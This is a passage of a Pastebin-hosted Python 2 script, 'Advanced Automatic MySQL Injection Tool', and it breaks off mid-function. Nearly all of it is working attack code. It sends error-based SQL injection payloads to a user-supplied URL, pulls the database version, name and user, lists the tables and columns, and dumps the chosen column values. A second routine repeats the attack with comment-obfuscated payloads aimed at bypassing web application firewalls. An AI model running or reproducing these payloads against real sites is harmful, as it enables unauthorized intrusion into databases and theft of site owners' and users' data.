MaDJ4mE5

Advanced Automatic MySQL Injection Tool

Apr 25th, 2015
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 77.22 KB | None | 0 0
  1. #!python
  2.  
  3. #   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  4. #   x----------------------------------------------------------------------------------------------------x
  5. #   x---------------------- AUTO MySQL INJECTION TOOL ---------------------------------------------------x
  6. #   x---------------------------Coded By hAxOr -James* --------------------------------------------------x
  7. #   x----------------------------------Security Is Just An ILLUSION -------------------------------------x
  8. #   x-------------------------------------Fuck Hacking--------We Love 3xpl0iting ! ----------------------x
  9. #   x----------------------------------------------------------------------------------------------------x
  10. #   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  11.  
  12. #                 --------------------------BEWARE--------------------------------------------------
  13. #                             Do Not Touch Or Change Anything!
  14. #                             Everything in this tool is highly Coded and has its own functions
  15. #                             Nothing will work if Changed or Removed !!
  16. #                 ----------------------------------------------------------------------------------
  17.  
  18. import sys
  19. import re
  20. import time
  21. import os
  22. import codecs
  23. import urllib2
  24. import urllib
  25.  
  26. str1 = 'User'
  27. userx = str1.encode('base64','strict')
  28. str2 = 'Pass'
  29. passx = str2.encode('base64','strict')
  30.  
  31. fvkem = 'base64_decode("b3Muc3lzdGVtKCJjbHMiKQ0KCQl0aW1lLnNsZWVwKDEpDQoJCW9zLnN5c3RlbSgidGl0bGUgICAgICAtICAgICAgQWR2YW5jZWQgQXV0b21hdGljIE15U1FMIEluamVjdGlvbiBUb29sICAgICA6OiAgIENvZGVkIEJ5IEphbWVzICAgOjoiKQ0KCQl1c3ggPSAnQW5hcycNCgkJcHN4ID0gJ3RyJw0KCQlwcmludCAiXG4gICAgICAgIyMjICAgICAgICBQbGVhc2UgTG9naW4gVG8gQ29udGludWUgICAgICAgICAgIyMjXG4iICAgIi0iKjU1DQoJCXBvbCA9IHJhd19pbnB1dCgiICBFbnRlciBZb3VyIFVzZXJuYW1lIDogIikNCgkJcG9sMSA9IHJhd19pbnB1dCgiICBFbnRlciBZb3VyIFBhc3N3b3JkIDogIikNCgkJaWYocG9sICE9IHVzeCk6DQoJCQlwcmludCAiVXNlcm5hbWUgaXMgSW5jb3JyZWN0ISINCgkJCXRpbWUuc2xlZXAoMSkNCgkJCXN5cy5leGl0KDApDQoJCWlmKHBvbDEgIT0gcHN4KToNCgkJCXByaW50ICJQYXNzd29yZCBpcyBJbmNvcnJlY3QhIg0KCQkJdGltZS5zbGVlcCgxKQ0KCQkJc3lzLmV4aXQoMCkNCgkJYWNjKCk=")'
  32.  
  33.  
  34. def xpath_simple():
  35.         time.sleep(.6)
  36.         print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
  37.         print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
  38.         ur = raw_input("Enter URL : ")
  39.         print "\n   Started Injecting\n   Please Wait .. \n"
  40.         xur = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,version()),0x3a)--+' % ur).read()
  41.         pr = re.findall("XPATH syntax error: ':(.*)'",xur,re.MULTILINE)
  42.         xur1 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,database()),0x3a)--+' % ur).read()
  43.         pr1 = re.findall("XPATH syntax error: ':(.*)'",xur1,re.MULTILINE)
  44.         xur2 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,user()),0x3a)--+' % ur).read()
  45.         pr2 = re.findall("XPATH syntax error: ':(.*)'",xur2,re.MULTILINE)
  46.        
  47.         print "\nDatabase Version : "
  48.         print pr
  49.         print "\nDatabase Name : "
  50.         print pr1
  51.         print "\nDatabase User : "
  52.         print pr2
  53.         print "\n"
  54.         xur3 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+0,1)),null)--+' % ur).read()
  55.         pr3 = re.findall("XPATH syntax error: ':(.*)'",xur3)
  56.         xur4 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+1,1)),null)--+' % ur).read()
  57.         pr4 = re.findall("XPATH syntax error: ':(.*)'",xur4)
  58.         xur5 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+2,1)),null)--+' % ur).read()
  59.         pr5 = re.findall("XPATH syntax error: ':(.*)'",xur5)
  60.         xur6 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+3,1)),null)--+' % ur).read()
  61.         pr6 = re.findall("XPATH syntax error: ':(.*)'",xur6)
  62.         xur7 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+4,1)),null)--+' % ur).read()
  63.         pr7 = re.findall("XPATH syntax error: ':(.*)'",xur7)
  64.         xur8 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+5,1)),null)--+' % ur).read()
  65.         pr8 = re.findall("XPATH syntax error: ':(.*)'",xur8)
  66.         xur9 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+6,1)),null)--+' % ur).read()
  67.         pr9 = re.findall("XPATH syntax error: ':(.*)'",xur9)
  68.         xur10 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+7,1)),null)--+' % ur).read()
  69.         pr10 = re.findall("XPATH syntax error: ':(.*)'",xur10)
  70.         xur11 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+8,1)),null)--+' % ur).read()
  71.         pr11 = re.findall("XPATH syntax error: ':(.*)'",xur11)
  72.         xur12 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+9,1)),null)--+' % ur).read()
  73.         pr12 = re.findall("XPATH syntax error: ':(.*)'",xur12)
  74.         xur13 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+10,1)),null)--+' % ur).read()
  75.         pr13 = re.findall("XPATH syntax error: ':(.*)'",xur13)
  76.         xur14 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+11,1)),null)--+' % ur).read()
  77.         pr14 = re.findall("XPATH syntax error: ':(.*)'",xur14)
  78.         xur15 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+12,1)),null)--+' % ur).read()
  79.         pr15 = re.findall("XPATH syntax error: ':(.*)'",xur15)
  80.         xur16 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+13,1)),null)--+' % ur).read()
  81.         pr16 = re.findall("XPATH syntax error: ':(.*)'",xur16)
  82.         xur17 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+14,1)),null)--+' % ur).read()
  83.         pr17 = re.findall("XPATH syntax error: ':(.*)'",xur17)
  84.         xur18 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+15,1)),null)--+' % ur).read()
  85.         pr18 = re.findall("XPATH syntax error: ':(.*)'",xur18)
  86.         xur19 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+16,1)),null)--+' % ur).read()
  87.         pr19 = re.findall("XPATH syntax error: ':(.*)'",xur19)
  88.         xur20 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+17,1)),null)--+' % ur).read()
  89.         pr20 = re.findall("XPATH syntax error: ':(.*)'",xur20)
  90.         xur21 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+18,1)),null)--+' % ur).read()
  91.         pr21 = re.findall("XPATH syntax error: ':(.*)'",xur21)
  92.         xur22 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+19,1)),null)--+' % ur).read()
  93.         pr22 = re.findall("XPATH syntax error: ':(.*)'",xur22)
  94.         xur23 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+table_name+from+information_Schema.tables+where+table_schema=database()+limit+20,1)),null)--+' % ur).read()
  95.         pr23 = re.findall("XPATH syntax error: ':(.*)'",xur23)
  96.        
  97.         print "\nTables :"
  98.         print pr3
  99.         print pr4
  100.         print pr5
  101.         print pr6
  102.         print pr7
  103.         print pr8
  104.         print pr9
  105.         print pr10
  106.         print pr11
  107.         print pr12
  108.         print pr13
  109.         print pr14
  110.         print pr15
  111.         print pr16
  112.         print pr17
  113.         print pr18
  114.         print pr19
  115.         print pr20
  116.         print pr21
  117.         print pr22
  118.         print pr23
  119.        
  120.         print "\n\n"
  121.         xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
  122.         xpcol1 = xpcol.encode("hex")
  123.         xur24 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+0,1)),null)--+' % ( ur, xpcol1)).read()
  124.         pr24 = re.findall("XPATH syntax error: ':(.*)'",xur24)
  125.         xur25 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+1,1)),null)--+' % ( ur, xpcol1)).read()
  126.         pr25 = re.findall("XPATH syntax error: ':(.*)'",xur25)
  127.         xur26 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+2,1)),null)--+' % ( ur, xpcol1)).read()
  128.         pr26 = re.findall("XPATH syntax error: ':(.*)'",xur26)
  129.         xur27 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+3,1)),null)--+' % ( ur, xpcol1)).read()
  130.         pr27 = re.findall("XPATH syntax error: ':(.*)'",xur27)
  131.         xur28 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+4,1)),null)--+' % ( ur, xpcol1)).read()
  132.         pr28 = re.findall("XPATH syntax error: ':(.*)'",xur28)
  133.         xur29 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+5,1)),null)--+' % ( ur, xpcol1)).read()
  134.         pr29 = re.findall("XPATH syntax error: ':(.*)'",xur29)
  135.         xur30 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+6,1)),null)--+' % ( ur, xpcol1)).read()
  136.         pr30 = re.findall("XPATH syntax error: ':(.*)'",xur30)
  137.         xur31 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+7,1)),null)--+' % ( ur, xpcol1)).read()
  138.         pr31 = re.findall("XPATH syntax error: ':(.*)'",xur31)
  139.         xur32 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+8,1)),null)--+' % ( ur, xpcol1)).read()
  140.         pr32 = re.findall("XPATH syntax error: ':(.*)'",xur32)
  141.         xur33 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+9,1)),null)--+' % ( ur, xpcol1)).read()
  142.         pr33 = re.findall("XPATH syntax error: ':(.*)'",xur33)
  143.         xur34 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+10,1)),null)--+' % ( ur, xpcol1)).read()
  144.         pr34 = re.findall("XPATH syntax error: ':(.*)'",xur34)
  145.         xur35 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+11,1)),null)--+' % ( ur, xpcol1)).read()
  146.         pr35 = re.findall("XPATH syntax error: ':(.*)'",xur35)
  147.         xur36 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+12,1)),null)--+' % ( ur, xpcol1)).read()
  148.         pr36 = re.findall("XPATH syntax error: ':(.*)'",xur36)
  149.         xur37 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+13,1)),null)--+' % ( ur, xpcol1)).read()
  150.         pr37 = re.findall("XPATH syntax error: ':(.*)'",xur37)
  151.         xur38 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+column_name+from+information_Schema.columns+where+table_name=0x%s+limit+14,1)),null)--+' % ( ur, xpcol1)).read()
  152.         pr38 = re.findall("XPATH syntax error: ':(.*)'",xur38)
  153.         print "\nColumns : "
  154.         print pr24
  155.         print pr25
  156.         print pr26
  157.         print pr27
  158.         print pr28
  159.         print pr29
  160.         print pr30
  161.         print pr31
  162.         print pr32
  163.         print pr33
  164.         print pr34
  165.         print pr35
  166.         print pr36
  167.         print pr37
  168.         print pr38
  169.        
  170.         print "\n  Note : If you don't want any column just leave it empty :)\n"
  171.         xpdt = raw_input("Enter First Column Name : ")
  172.         xpdt1 = raw_input("Enter Second Column Name : ")
  173.         xpdt2 = raw_input("Enter Third Column Name : ")
  174.         xpdt3 = raw_input("Enter Fourth Column Name : ")
  175.         xpdt4 = raw_input("Enter Fifth Column Name : ")
  176.         xur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt, xpcol)).read()
  177.         pr39 = re.findall("XPATH syntax error: ':(.*)'",xur39)
  178.         xur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt1, xpcol)).read()
  179.         pr40 = re.findall("XPATH syntax error: ':(.*)'",xur40)
  180.         xur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt2, xpcol)).read()
  181.         pr41 = re.findall("XPATH syntax error: ':(.*)'",xur41)
  182.         xur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt3, xpcol)).read()
  183.         pr42 = re.findall("XPATH syntax error: ':(.*)'",xur42)
  184.         xur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat(0x3a,(select+%s+from+%s+limit+0,1)),null)--+' % ( ur, xpdt4, xpcol)).read()
  185.         pr43 = re.findall("XPATH syntax error: ':(.*)'",xur43)
  186.        
  187.         print "\n\nFirst Column Result : "
  188.         print pr39
  189.         print "\nSecond Column Result : "
  190.         print pr40
  191.         print "\nThird Column Result : "
  192.         print pr41
  193.         print "\nFourth Column Result : "
  194.         print pr42
  195.         print "\nFifth Column Result : "
  196.         print pr43
  197.        
  198.         print "\n\n   All Processes Done!\n   Turning Off All Functions!"
  199.         time.sleep(1)
  200.         print "Press Enter To Exit.."
  201.        
  202. def xpath_waf():
  203.         time.sleep(.6)
  204.         print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
  205.         print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
  206.         wfur = raw_input("Enter URL : ")
  207.         print "\n   Started Injecting\n   Please Wait .. \n"
  208.         time.sleep(2.5)
  209.         print "   WAF Killed The Injection Process !!\n   Bypassing This Shit!\n"
  210.         wfxur = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,version())*/,0x3a)--+' % wfur).read()
  211.         wfpr = re.findall("XPATH syntax error: ':(.*)'",wfxur,re.MULTILINE)
  212.         wfxur1 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,database())*/,0x3a)--+' % wfur).read()
  213.         wfpr1 = re.findall("XPATH syntax error: ':(.*)'",wfxur1,re.MULTILINE)
  214.         wfxur2 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,user())*/,0x3a)--+' % wfur).read()
  215.         wfpr2 = re.findall("XPATH syntax error: ':(.*)'",wfxur2,re.MULTILINE)
  216.         wfxur3 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+0,1)),null)--+' % wfur).read()
  217.         wfpr3 = re.findall("XPATH syntax error: ':(.*)'",wfxur3)
  218.         wfxur4 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+1,1)),null)--+' % wfur).read()
  219.         wfpr4 = re.findall("XPATH syntax error: ':(.*)'",wfxur4)
  220.         wfxur5 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+2,1)),null)--+' % wfur).read()
  221.         wfpr5 = re.findall("XPATH syntax error: ':(.*)'",wfxur5)
  222.         wfxur6 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+3,1)),null)--+' % wfur).read()
  223.         wfpr6 = re.findall("XPATH syntax error: ':(.*)'",wfxur6)
  224.         wfxur7 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+4,1)),null)--+' % wfur).read()
  225.         wfpr7 = re.findall("XPATH syntax error: ':(.*)'",wfxur7)
  226.         wfxur8 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+5,1)),null)--+' % wfur).read()
  227.         wfpr8 = re.findall("XPATH syntax error: ':(.*)'",wfxur8)
  228.         wfxur9 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+6,1)),null)--+' % wfur).read()
  229.         wfpr9 = re.findall("XPATH syntax error: ':(.*)'",wfxur9)
  230.         wfxur10 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+7,1)),null)--+' % wfur).read()
  231.         wfpr10 = re.findall("XPATH syntax error: ':(.*)'",wfxur10)
  232.         wfxur11 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+8,1)),null)--+' % wfur).read()
  233.         wfpr11 = re.findall("XPATH syntax error: ':(.*)'",wfxur11)
  234.         wfxur12 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+9,1)),null)--+' % wfur).read()
  235.         wfpr12 = re.findall("XPATH syntax error: ':(.*)'",wfxur12)
  236.         wfxur13 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+10,1)),null)--+' % wfur).read()
  237.         wfpr13 = re.findall("XPATH syntax error: ':(.*)'",wfxur13)
  238.         wfxur14 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+11,1)),null)--+' % wfur).read()
  239.         wfpr14 = re.findall("XPATH syntax error: ':(.*)'",wfxur14)
  240.         wfxur15 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+12,1)),null)--+' % wfur).read()
  241.         wfpr15 = re.findall("XPATH syntax error: ':(.*)'",wfxur15)
  242.         wfxur16 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+13,1)),null)--+' % wfur).read()
  243.         wfpr16 = re.findall("XPATH syntax error: ':(.*)'",wfxur16)
  244.         wfxur17 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+14,1)),null)--+' % wfur).read()
  245.         wfpr17 = re.findall("XPATH syntax error: ':(.*)'",wfxur17)
  246.         wfxur18 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+15,1)),null)--+' % wfur).read()
  247.         wfpr18 = re.findall("XPATH syntax error: ':(.*)'",wfxur18)
  248.         wfxur19 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+16,1)),null)--+' % wfur).read()
  249.         wfpr19 = re.findall("XPATH syntax error: ':(.*)'",wfxur19)
  250.         wfxur20 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+17,1)),null)--+' % wfur).read()
  251.         wfpr20 = re.findall("XPATH syntax error: ':(.*)'",wfxur20)
  252.         wfxur21 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+18,1)),null)--+' % wfur).read()
  253.         wfpr21 = re.findall("XPATH syntax error: ':(.*)'",wfxur21)
  254.         wfxur22 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+19,1)),null)--+' % wfur).read()
  255.         wfpr22 = re.findall("XPATH syntax error: ':(.*)'",wfxur22)
  256.         wfxur23 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!table_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/tables+where+table_schema=database()+limit+20,1)),null)--+' % wfur).read()
  257.         wfpr23 = re.findall("XPATH syntax error: ':(.*)'",wfxur23)
  258.        
  259.         print "\nDatabase Version : "
  260.         print wfpr
  261.         print "\nDatabase Name : "
  262.         print wfpr1
  263.         print "\nDatabase User : "
  264.         print wfpr2
  265.         print "\nTables :"
  266.         print wfpr3
  267.         print wfpr4
  268.         print wfpr5
  269.         print wfpr6
  270.         print wfpr7
  271.         print wfpr8
  272.         print wfpr9
  273.         print wfpr10
  274.         print wfpr11
  275.         print wfpr12
  276.         print wfpr13
  277.         print wfpr14
  278.         print wfpr15
  279.         print wfpr16
  280.         print wfpr17
  281.         print wfpr18
  282.         print wfpr19
  283.         print wfpr20
  284.         print wfpr21
  285.         print wfpr22
  286.         print wfpr23
  287.        
  288.         print "\n\n"
  289.         wfxpcol = raw_input("Enter The Name Of Table to Grab Columns :")
  290.         wfxpcol1 = wfxpcol.encode("hex")
  291.         wfxur24 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  292.         wfpr24 = re.findall("XPATH syntax error: ':(.*)'",wfxur24)
  293.         wfxur25 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+1,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  294.         wfpr25 = re.findall("XPATH syntax error: ':(.*)'",wfxur25)
  295.         wfxur26 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+2,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  296.         wfpr26 = re.findall("XPATH syntax error: ':(.*)'",wfxur26)
  297.         wfxur27 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+3,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  298.         wfpr27 = re.findall("XPATH syntax error: ':(.*)'",wfxur27)
  299.         wfxur28 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+4,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  300.         wfpr28 = re.findall("XPATH syntax error: ':(.*)'",wfxur28)
  301.         wfxur29 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+5,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  302.         wfpr29 = re.findall("XPATH syntax error: ':(.*)'",wfxur29)
  303.         wfxur30 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+6,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  304.         wfpr30 = re.findall("XPATH syntax error: ':(.*)'",wfxur30)
  305.         wfxur31 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+7,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  306.         wfpr31 = re.findall("XPATH syntax error: ':(.*)'",wfxur31)
  307.         wfxur32 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+8,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  308.         wfpr32 = re.findall("XPATH syntax error: ':(.*)'",wfxur32)
  309.         wfxur33 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+9,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  310.         wfpr33 = re.findall("XPATH syntax error: ':(.*)'",wfxur33)
  311.         wfxur34 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+10,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  312.         wfpr34 = re.findall("XPATH syntax error: ':(.*)'",wfxur34)
  313.         wfxur35 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+11,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  314.         wfpr35 = re.findall("XPATH syntax error: ':(.*)'",wfxur35)
